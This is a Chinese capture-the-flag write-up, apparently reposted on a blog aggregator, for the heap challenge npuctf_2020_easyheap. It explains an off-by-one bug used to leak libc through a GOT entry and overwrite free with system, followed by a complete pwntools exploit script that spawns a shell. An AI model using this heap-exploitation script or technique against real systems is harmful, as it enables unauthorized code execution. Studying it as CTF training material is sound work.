off by one 改got表

S0pHi3 / 2024-09-03 / 原文

BUU——npuctf_2020_easyheap

off by one利用:每次申请chunk程序默认申请一个0x10大小的chunk,用于存自己申请的chunk的大小和地址,正是利用这个地址,将其修改为free_got泄露libc基地址,之后再将free地址修改为system函数,传入"/bin/sh\x00"即可system("/bin/sh")。

如何修改:申请两个chunk,利用off by one 将chunk1大小修改为0x41,free chunk1时,先free chunk1,再free chunk1的默认chunk。再次将chunk1申请回来,先用chunk1的地址处空间给new chunk1默认chunk,然后再分配给new chunk1地址。所以new chunk1的默认chunk占用了原来chunk1的位置(被写入free_got),此时show(new_chunk1),根据 new chunk 的 默认chunk中存的new chunk的地址,即上述写入的free_got,泄露libc基地址。

主要思路:free chunk和再次申请chunk时,默认chunk和chunk的顺序不同,可导致了内容交换、泄露。修改free_got指向system

from pwn import *
from LibcSearcher import *
from struct import *

local = 1
debug = 1

binary = "./npuctf_2020_easyheap"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
    # lib = "/lib/i386-linux-gnu/libc.so.6"
else:
    ip = "node5.buuoj.cn"
    port = "26858"
    p = remote(ip, port)
    lib = ""

if lib != "":
    libc = ELF(lib)

def launch_gdb():
    gdb.attach(p)
    pause()

def log_puts_addr():
    print("puts_addr is ",hex(puts_addr))

def log_canary():
    print("canary is ",hex(canary)) 


atoi_got = elf.got['atoi']
free_got = elf.got['free']

def cmd(choice):
	p.recvuntil("Your choice :")
	p.sendline(str(choice))

def create(size,content):
	cmd(1)
	p.recvuntil("only) :")
	p.sendline(str(size))
	p.recvuntil("Content:")
	p.sendline(content)

def edit(idx,content):
	cmd(2)
	p.recvuntil("Index :")
	p.sendline(str(idx))
	p.recvuntil("Content:")
	p.sendline(content)

def show(idx):
	cmd(3)
	p.recvuntil("Index :")
	p.sendline(str(idx))

def delete(idx):
	cmd(4)
	p.recvuntil("Index :")
	p.sendline(str(idx))

create(0x18,"aaaa")
create(0x18,"aaaa")

launch_gdb()

payload = b'/bin/sh\x00'
payload += p64(0) * 2
payload += p64(0x41)
edit(0,payload)

delete(1)
payload = b'a' * 0x20 + p64(0x38) + p64(atoi_got)
create(0x38,payload)
show(1)
free_addr = u64(p.recvuntil(b"\x7f")[-6:]+b"\x00\x00")

print(hex(free_addr))

libc_base = free_addr - libc.sym['atoi']
system = libc_base + libc.sym['system']

edit(1,p64(system))
delete(0)

p.interactive()

off by one 改got表更多相关文章

今日报告-66

设置Windows10暂停更新3000天

AQS公平锁的流程

AMD锐龙7 7800X3D网游专项测试:竟比i9-13900KS强了15%

常用总线技术基本参数对比

探索图像数据中的隐藏信息:语义实体识别和关系抽取的奇妙之旅

设置Chrome浏览器自动升级

JavaScript – 小技巧 Tips

Winform无边框窗体实现拖动

STM32基础(一)

技术人的修炼---九五小庞

vue自定义事件用法及$emit

ODOO 科目配置4

sqlite 触发器 c#

postgresql在插入数据后怎么获取自增id

EF Core 的基本使用

error: failed to push some refs to 'https://github.com/*******/********.github.io.git'

欧拉降幂

编程语言能力对比

基于机器视觉的小车轨迹控制软件界面展示

随机推荐

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java,启动!

什么是IT技术

即将到来!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

热门话题

Ethernaut Level 11: Elevator Attack and Blockchain Interaction

快速部署开源spug运维平台的Docker安装指南

驱动调试之printk的原理与使用

计算机思维模型及其应用

华为云发布代码大模型PanGu-Coder2,实现高效代码生成

Linux多硬盘数据存储和分区操作

构建高可用架构: 分层冗余与自动故障转移

LoRA:高效调参的大语言模型适应方法

《分布式系统的基本原理及互联网分层架构的本质》

Hadoop写流程解析

Java架构师的系统架构设计方法论中的规范要点

使用observeDOM解决BetterScroll插件在移动端无法滑动的问题

互联网一致性架构设计实践

高并发系统架构与水平扩展

混合应用的崛起:跨平台开发取代原生应用

  穗舟网 (www.seizhou.com)

本站除标明"本站原创"外所有文章版权归创作人所有,本站不承担任何法律责任和连带责任,如有冒犯请直接联系,我们将立即予以纠正并致歉。

Powered by WordPress  ·  v1.0.0-alpha